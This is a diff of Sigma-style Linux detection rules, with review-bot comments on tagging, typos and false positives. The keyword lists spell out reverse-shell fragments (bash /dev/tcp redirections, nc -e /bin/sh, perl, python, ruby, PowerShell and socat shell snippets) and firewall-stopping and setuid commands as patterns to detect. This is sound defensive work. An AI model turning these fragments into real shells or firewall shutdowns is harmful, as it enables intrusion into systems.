'*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml index 7501d26ed..caa3385ba 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml 
@@ -2,20 +2,24 @@ title: Suspicious Log Entries id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 status: test description: Detects suspicious log entries in Linux log files -author: Florian Roth +references: + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml +author: Florian Roth (Nextron Systems) date: 2017/03/25 modified: 2021/11/27 +tags: + - attack.impact logsource: - product: linux + product: linux detection: - keywords: - - entered promiscuous mode - - Deactivating service - - Oversized packet received from - - imuxsock begins to drop messages - condition: keywords + keywords: + # Generic suspicious log lines + - 'entered promiscuous mode' + # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml + - 'Deactivating service' + - 'Oversized packet received from' + - 'imuxsock begins to drop messages' + condition: keywords falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.impact diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml index e8fe87ee7..58d50b2a2 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml 
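Review bot: The new `references` entry links `ossec-hids/blob/master/…/syslog_rules.xml`, while every other reference touched in this commit is pinned to a commit hash (the ClamAV rule in this same commit pins the same repository at `1ecffb1b…`); a `master` link drifts silently and should be pinned the same way, e.g. `- https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/syslog_rules.xml`, assuming the file exists at that revision. Separately, `entered promiscuous mode` is the kernel's sniffer indicator and maps to T1040 Network Sniffing, not to the lone `attack.impact` tag the hunk keeps; adding `- attack.credential_access` and `- attack.t1040` would make the alert routable to the right tactic view.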
@@ -2,44 +2,44 @@ title: Suspicious Reverse Shell Command Line id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab status: test description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell -author: Florian Roth references: - - https://alamot.github.io/reverse_shells/ + - https://alamot.github.io/reverse_shells/ +author: Florian Roth (Nextron Systems) date: 2019/04/02 modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux + product: linux detection: - keywords: - - 'BEGIN {s = "/inet/tcp/0/' - - 'bash -i >& /dev/tcp/' - - 'bash -i >& /dev/udp/' - - 'sh -i >$ /dev/udp/' - - 'sh -i >$ /dev/tcp/' - - '&& while read line 0<&5; do' - - '/bin/bash -c exec 5<>/dev/tcp/' - - '/bin/bash -c exec 5<>/dev/udp/' - - 'nc -e /bin/sh ' - - '/bin/sh | nc' - - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' - - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' - - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' - - '/bin/sh -i <&3 >&3 2>&3' - - 'uname -a; w; id; /bin/bash -i' - - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' - - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' - - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' - - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' - - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' - - 'rm -f /tmp/p; mknod /tmp/p p &&' - - ' | /bin/bash | telnet ' - - ',echo=0,raw tcp-listen:' - - 'nc -lvvp ' - - 'xterm -display 1' - condition: keywords + keywords: + - 'BEGIN {s = "/inet/tcp/0/' + - 'bash -i >& /dev/tcp/' + - 'bash -i >& /dev/udp/' + - 'sh -i >$ /dev/udp/' + - 'sh -i >$ /dev/tcp/' + - '&& while read line 0<&5; do' + - '/bin/bash -c exec 5<>/dev/tcp/' + - '/bin/bash -c exec 5<>/dev/udp/' + - 'nc -e /bin/sh ' + - 
'/bin/sh | nc' + - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' + - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' + - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + - '/bin/sh -i <&3 >&3 2>&3' + - 'uname -a; w; id; /bin/bash -i' + - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' + - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' + - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' + - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' + - 'rm -f /tmp/p; mknod /tmp/p p &&' + - ' | /bin/bash | telnet ' + - ',echo=0,raw tcp-listen:' + - 'nc -lvvp ' + - 'xterm -display 1' + condition: keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_shellshock.yml b/src/main/resources/rules/linux/builtin/lnx_shellshock.yml index 13ed22033..8e9b5d2f4 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shellshock.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shellshock.yml @@ -1,12 +1,15 @@ title: Shellshock Expression id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e -status: experimental +status: test description: Detects shellshock expressions in log files -author: Florian Roth -date: 2017/03/14 -modified: 2021/04/28 references: - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf +author: Florian Roth (Nextron Systems) +date: 2017/03/14 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1505.003 logsource: product: linux detection: @@ -19,6 +22,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.persistence - - attack.t1505.003 
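Review bot: The keywords `'sh -i >$ /dev/udp/'` and `'sh -i >$ /dev/tcp/'` look like typos for the `>&` redirection — the `bash -i >& /dev/tcp/` entries two lines above use `>&`, and `lnx_susp_dev_tcp.yml` in this same commit spells the sh variant as `'sh -i >& /dev/udp/'`. In bash, `>$ ` redirects stdout to a file literally named `$`, so these two entries can never match a working reverse shell; suggest `- 'sh -i >& /dev/udp/'` and `- 'sh -i >& /dev/tcp/'`, with the `modified` date bumped since the hunk otherwise only re-indents.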
diff --git a/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml b/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml index c963868b7..722dd1e67 100644 --- a/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml +++ b/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml @@ -2,21 +2,21 @@ title: Space After Filename id: 879c3015-c88b-4782-93d7-07adf92dbcb7 status: test description: Detects space after filename -author: Ömer Günal references: - - https://attack.mitre.org/techniques/T1064 + - https://attack.mitre.org/techniques/T1064 +author: Ömer Günal date: 2020/06/17 modified: 2021/11/27 +tags: + - attack.execution logsource: - product: linux + product: linux detection: - selection1: - - 'echo "*" > * && chmod +x *' - selection2: - - 'mv * "* "' - condition: selection1 and selection2 + selection1: + - 'echo "*" > * && chmod +x *' + selection2: + - 'mv * "* "' + condition: all of selection* falsepositives: - - Typos + - Typos level: low -tags: - - attack.execution diff --git a/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml b/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml index 3c9b00d8c..d8f68a34f 100644 --- a/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml +++ b/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml 
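Review bot: The reference points at T1064, which ATT&CK deprecated and folded into T1059, while the behaviour this rule describes has its own sub-technique, T1036.006 Masquerading: Space after Filename, that is left off entirely; the `all of selection*` tidy-up is fine, but the tags should be `- attack.defense_evasion` and `- attack.t1036.006`, with the reference updated to `https://attack.mitre.org/techniques/T1036/006/`. Note also that `selection2` (`mv * "* "`) only catches the double-quoted spelling; `mv foo 'foo '` or an escaped `foo\ ` are not matched, which is worth stating in the description so the low level is understood.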
@@ -1,31 +1,31 @@ title: Suspicious Use of /dev/tcp id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c -status: experimental +status: test description: Detects suspicious command with /dev/tcp -author: frack113 references: - - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ - - https://book.hacktricks.xyz/shells/shells/linux - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan + - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ + - https://book.hacktricks.xyz/shells/shells/linux + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan +author: frack113 date: 2021/12/10 -modified: 2022/01/10 +modified: 2023/01/06 +tags: + - attack.reconnaissance logsource: - product: linux + product: linux detection: - keyword: - - 'cat /dev/tcp/' - - 'echo >/dev/tcp/' - - 'bash -i >& /dev/tcp/' - - 'sh -i >& /dev/udp/' - - '0<&196;exec 196<>/dev/tcp/' - - 'exec 5<>/dev/tcp/' - - '(sh)0>/dev/tcp/' - - 'bash -c ''bash -i >& /dev/tcp/' - - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' - condition: 1 of keyword + keywords: + - 'cat /dev/tcp/' + - 'echo >/dev/tcp/' + - 'bash -i >& /dev/tcp/' + - 'sh -i >& /dev/udp/' + - '0<&196;exec 196<>/dev/tcp/' + - 'exec 5<>/dev/tcp/' + - '(sh)0>/dev/tcp/' + - 'bash -c ''bash -i >& /dev/tcp/' + - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' + condition: keywords falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.reconnaissance diff --git a/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml b/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml index 118ed0cd3..eceedcdb6 100644 --- a/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml +++ b/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml 
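Review bot: The only tag on the new side is `attack.reconnaissance`, but that tactic covers pre-compromise activity; the keywords here are post-exploitation bash reverse shells (`bash -i >& /dev/tcp/`, `exec 5<>/dev/tcp/`) and the `/dev/tcp` port scan from the referenced atomic, which belong to T1059.004 (Execution: Unix Shell) and T1046 (Discovery: Network Service Discovery). Suggest replacing the tags block with `- attack.execution`, `- attack.t1059.004`, `- attack.discovery`, `- attack.t1046`. The rename from `keyword` to `keywords` with `condition: keywords` is the right shape for an unbound list.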
@@ -2,22 +2,22 @@ title: JexBoss Command Sequence
 id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae
 status: test
 description: Detects suspicious command sequence that JexBoss
-author: Florian Roth
 references:
- - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
+ - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
+author: Florian Roth (Nextron Systems)
 date: 2017/08/24
-modified: 2021/11/27
+modified: 2022/07/07
+tags:
+ - attack.execution
+ - attack.t1059.004
 logsource:
- product: linux
+ product: linux
 detection:
- selection1:
- - 'bash -c /bin/bash'
- selection2:
- - '&/dev/tcp/'
- condition: selection1 and selection2
+ selection1:
+ - 'bash -c /bin/bash'
+ selection2:
+ - '&/dev/tcp/'
+ condition: all of selection*
 falsepositives:
- - Unknown
+ - Unknown
 level: high
-tags:
- - attack.execution
- - attack.t1059.004
diff --git a/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml b/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml
index 4e26563e6..75393a3b9 100644
--- a/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml
+++ b/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml
@@ -2,21 +2,21 @@ title: Symlink Etc Passwd
 id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523
 status: test
 description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
-author: Florian Roth
 references:
- - https://www.qualys.com/2021/05/04/21nails/21nails.txt
+ - https://www.qualys.com/2021/05/04/21nails/21nails.txt
+author: Florian Roth (Nextron Systems)
 date: 2019/04/05
 modified: 2021/11/27
+tags:
+ - attack.t1204.001
+ - attack.execution
 logsource:
- product: linux
+ product: linux
 detection:
- keywords:
- - 'ln -s -f /etc/passwd'
- - 'ln -s /etc/passwd'
- condition: keywords
+ keywords:
+ - 'ln -s -f /etc/passwd'
+ - 'ln -s /etc/passwd'
+ condition: keywords
 falsepositives:
- - Unknown
+ - Unknown
 level: high
-tags:
- - attack.t1204.001
- - attack.execution
diff --git a/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml
new file mode 100644
index 000000000..f9c561aaa
--- /dev/null
+++ b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml
@@ -0,0 +1,22 @@
+title: SSHD Error Message CVE-2018-15473
+id: 4c9d903d-4939-4094-ade0-3cb748f4d7da
+status: test
+description: Detects exploitation attempt using public exploit code for CVE-2018-15473
+references:
+ - https://github.com/Rhynorater/CVE-2018-15473-Exploit
+author: Florian Roth (Nextron Systems)
+date: 2017/08/24
+modified: 2021/11/27
+tags:
+ - attack.reconnaissance
+ - attack.t1589
+logsource:
+ product: linux
+ service: sshd
+detection:
+ keywords:
+ - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'
+ condition: keywords
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
new file mode 100644
index 000000000..8584d39b6
--- /dev/null
+++ b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
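Review bot: The only keyword hard-codes the exact lengths `1907` and `308` from the error line produced by the one referenced exploit script, so the rule is an indicator for that script rather than for CVE-2018-15473 in general; the description should say so, e.g. `Detects the sshd error line produced by the public Rhynorater exploit script for CVE-2018-15473 (the buffer sizes are specific to that script)`, so that an absence of hits is not read as an absence of exploitation. `date: 2017/08/24` also predates the 2018 CVE identifier and looks copied from another rule; if the real creation date is unknown, the `modified` value is the safer choice.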
@@ -0,0 +1,33 @@
+title: Suspicious OpenSSH Daemon Error
+id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc
+status: test
+description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
+references:
+ - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c
+ - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
+author: Florian Roth (Nextron Systems)
+date: 2017/06/30
+modified: 2021/11/27
+tags:
+ - attack.initial_access
+ - attack.t1190
+logsource:
+ product: linux
+ service: sshd
+detection:
+ keywords:
+ - 'unexpected internal error'
+ - 'unknown or unsupported key type'
+ - 'invalid certificate signing key'
+ - 'invalid elliptic curve value'
+ - 'incorrect signature'
+ - 'error in libcrypto'
+ - 'unexpected bytes remain after decoding'
+ - 'fatal: buffer_get_string: bad string'
+ - 'Local: crc32 compensation attack'
+ - 'bad client public DH value'
+ - 'Corrupted MAC on input'
+ condition: keywords
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml b/src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
similarity index 85%
rename from src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml
rename to src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
index d95240e1b..20808e855 100644
--- a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml
+++ b/src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml
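Review bot: `falsepositives: - Unknown` leaves out the most common benign source of several of these strings: `'Corrupted MAC on input'`, `'incorrect signature'` and `'bad client public DH value'` are transport-layer errors that can also appear with network corruption, faulty middleboxes or non-compliant/legacy clients, and an analyst triaging a medium alert needs that context. Suggest replacing the entry with `- Network corruption, faulty middleboxes or non-compliant SSH clients can produce MAC and signature errors without any attack`. The rule keeps the old `level: medium` while mixing clearly benign-capable strings with hard failures such as `'fatal: buffer_get_string: bad string'`; splitting the list by severity would let the fatal ones carry a higher level without raising noise.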
@@ -1,25 +1,25 @@
-title: Sudo Privilege Escalation CVE-2019-14287
+title: Sudo Privilege Escalation CVE-2019-14287 - Builtin
 id: 7fcc54cb-f27d-4684-84b7-436af096f858
 related:
 - id: f74107df-b6c6-4e80-bf00-4170b658162b
 type: derived
-status: experimental
+status: test
 description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
-author: Florian Roth
-date: 2019/10/15
-modified: 2021/11/11
 references:
 - https://www.openwall.com/lists/oss-security/2019/10/14/1
 - https://access.redhat.com/security/cve/cve-2019-14287
 - https://twitter.com/matthieugarin/status/1183970598210412546
-logsource:
- product: linux
- service: sudo
+author: Florian Roth (Nextron Systems)
+date: 2019/10/15
+modified: 2022/11/26
 tags:
 - attack.privilege_escalation
 - attack.t1068
 - attack.t1548.003
 - cve.2019.14287
+logsource:
+ product: linux
+ service: sudo
 detection:
 selection_user:
 USER:
diff --git a/src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml
similarity index 56%
rename from src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml
rename to src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml
index 096ab0368..0ae57f854 100644
--- a/src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml
+++ b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml
@@ -1,15 +1,15 @@
-title: Disabling Security Tools
+title: Disabling Security Tools - Builtin
 id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36
 related:
 - id: e3a8a052-111f-4606-9aee-f28ebeb76776
 type: derived
-status: experimental
+status: test
 description: Detects disabling security tools
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
 author: Ömer Günal, Alejandro Ortuno, oscd.community
 date: 2020/06/17
-modified: 2021/09/14
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md
+modified: 2022/11/26
 tags:
 - attack.defense_evasion
 - attack.t1562.004
@@ -18,11 +18,11 @@ logsource:
 service: syslog
 detection:
 keywords:
- - '*stopping iptables*'
- - '*stopping ip6tables*'
- - '*stopping firewalld*'
- - '*stopping cbdaemon*'
- - '*stopping falcon-sensor*'
+ - 'stopping iptables'
+ - 'stopping ip6tables'
+ - 'stopping firewalld'
+ - 'stopping cbdaemon'
+ - 'stopping falcon-sensor'
 condition: keywords
 falsepositives:
 - Legitimate administration activities
diff --git a/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
new file mode 100644
index 000000000..86afe19fd
--- /dev/null
+++ b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
@@ -0,0 +1,24 @@
+title: Suspicious Named Error
+id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365
+status: test
+description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
+references:
+ - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
+author: Florian Roth (Nextron Systems)
+date: 2018/02/20
+modified: 2022/10/05
+tags:
+ - attack.initial_access
+ - attack.t1190
+logsource:
+ product: linux
+ service: syslog
+detection:
+ keywords:
+ - ' dropping source port zero packet from '
+ - ' denied AXFR from '
+ - ' exiting (due to fatal error)'
+ condition: keywords
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml b/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
new file mode 100644
index 000000000..bbdfe379f
--- /dev/null
+++ b/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
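Review bot: `' denied AXFR from '` is logged for every refused zone-transfer request, which on an Internet-facing authoritative server is routine scanner and misconfigured-secondary noise rather than evidence of exploitation, so `level: high` combined with `falsepositives: - Unknown` will very likely page on background traffic. Either list that case, e.g. `falsepositives: - Refused zone transfers from misconfigured secondaries or Internet scanners are common on public authoritative servers`, or move the AXFR string into its own lower-level rule and keep `high` for the `dropping source port zero packet` and fatal-exit strings.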
@@ -0,0 +1,38 @@
+title: Suspicious VSFTPD Error Messages
+id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe
+status: test
+description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
+references:
+ - https://github.com/dagwieers/vsftpd/
+author: Florian Roth (Nextron Systems)
+date: 2017/07/05
+modified: 2021/11/27
+tags:
+ - attack.initial_access
+ - attack.t1190
+logsource:
+ product: linux
+ service: vsftpd
+detection:
+ keywords:
+ - 'Connection refused: too many sessions for this address.'
+ - 'Connection refused: tcp_wrappers denial.'
+ - 'Bad HTTP verb.'
+ - 'port and pasv both active'
+ - 'pasv and port both active'
+ - 'Transfer done (but failed to open directory).'
+ - 'Could not set file modification time.'
+ - 'bug: pid active in ptrace_sandbox_free'
+ - 'PTRACE_SETOPTIONS failure'
+ - 'weird status:'
+ - 'couldn''t handle sandbox event'
+ - 'syscall * out of bounds'
+ - 'syscall not permitted:'
+ - 'syscall validate failed:'
+ - 'Input line too long.'
+ - 'poor buffer accounting in str_netfd_alloc'
+ - 'vsf_sysutil_read_loop'
+ condition: keywords
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml b/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml
deleted file mode 100644
index 03ac93263..000000000
--- a/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml
+++ /dev/null
@@ -1,32 +0,0 @@
-title: Cron Files
-id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05
-status: experimental
-description: Detects creation of cron files or files in Cron directories. Potential persistence.
-date: 2021/10/15
-author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-tags:
- - attack.persistence
- - attack.t1053.003
-references:
- - https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml
-logsource:
- product: linux
- category: file_create
-detection:
- selection1:
- TargetFilename|startswith:
- - '/etc/cron.d/'
- - '/etc/cron.daily/'
- - '/etc/cron.hourly/'
- - '/etc/cron.monthly/'
- - '/etc/cron.weekly/'
- - '/var/spool/cron/crontabs/'
- selection2:
- TargetFilename|contains:
- - '/etc/cron.allow'
- - '/etc/cron.deny'
- - '/etc/crontab'
- condition: selection1 or selection2
-falsepositives:
- - Any legitimate cron file.
-level: medium
diff --git a/src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml
similarity index 92%
rename from src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml
rename to src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml
index 11c4e0635..be5bdee6f 100644
--- a/src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml
@@ -7,12 +7,13 @@ references:
 - https://www.makeuseof.com/how-to-install-and-use-doas/
 author: Sittikorn S, Teoderick Contreras
 date: 2022/01/20
+modified: 2022/12/31
 tags:
 - attack.privilege_escalation
 - attack.t1548
 logsource:
 product: linux
- category: file_create
+ category: file_event
 detection:
 selection:
 TargetFilename|endswith: '/etc/doas.conf'
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml
new file mode 100644
index 000000000..cd9e431c8
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml
@@ -0,0 +1,33 @@
+title: Persistence Via Cron Files
+id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05
+status: test
+description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
+references:
+ - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml
+author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+date: 2021/10/15
+modified: 2022/12/31
+tags:
+ - attack.persistence
+ - attack.t1053.003
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection1:
+ TargetFilename|startswith:
+ - '/etc/cron.d/'
+ - '/etc/cron.daily/'
+ - '/etc/cron.hourly/'
+ - '/etc/cron.monthly/'
+ - '/etc/cron.weekly/'
+ - '/var/spool/cron/crontabs/'
+ selection2:
+ TargetFilename|contains:
+ - '/etc/cron.allow'
+ - '/etc/cron.deny'
+ - '/etc/crontab'
+ condition: 1 of selection*
+falsepositives:
+ - Any legitimate cron file.
+level: medium
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
new file mode 100644
index 000000000..1ba00ab8e
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
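Review bot: `TargetFilename|startswith` lists only `'/var/spool/cron/crontabs/'`, but on RHEL/Fedora-family systems per-user crontabs are written directly under `/var/spool/cron/`, so a crontab dropped there matches neither selection and the rule is silently Debian-only. Replacing that entry with `- '/var/spool/cron/'` keeps the existing path covered (it is a prefix of it) and closes the gap; the description's `could indicates` should also read `could indicate`.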
@@ -0,0 +1,22 @@
+title: Persistence Via Sudoers Files
+id: ddb26b76-4447-4807-871f-1b035b2bfa5d
+status: test
+description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
+references:
+ - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/05
+modified: 2022/12/31
+tags:
+ - attack.persistence
+ - attack.t1053.003
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection:
+ TargetFilename|startswith: '/etc/sudoers.d/'
+ condition: selection
+falsepositives:
+ - Creation of legitimate files in sudoers.d folder part of administrator work
+level: medium
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml
new file mode 100644
index 000000000..533c0c4ed
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml
